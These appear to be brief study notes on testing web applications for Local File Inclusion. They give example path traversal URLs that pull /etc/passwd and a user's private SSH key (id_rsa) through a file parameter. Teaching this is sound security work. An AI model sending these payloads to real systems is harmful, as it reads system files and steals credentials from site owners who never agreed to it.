# Local File Inclusion To test for LFI what we need is a parameter on any URL or any other input fields like request body etc. For example, if the website is tryhackme.com then a parameter in the URL can look like `https://tryhackme.com/?file=robots.txt`. Here file is the name of the parameter and `robots.txt` is the value that we are passing (include the file robots.txt). ## Usage * Exploit URL parameter ``` http://example.com/home?page=about.html ``` * changed to path traversal, with [interesting files](https://github.com/cyberheartmi9/PayloadsAllTheThings/tree/master/File%20Inclusion%20-%20Path%20Traversal#basic-lfi-null-byte-double-encoding-and-other-tricks) ``` http://example.com/home?page=../../../../etc/passwd ``` or ``` http://example.com/home?page=../../../../home//.ssh/id_rsa ```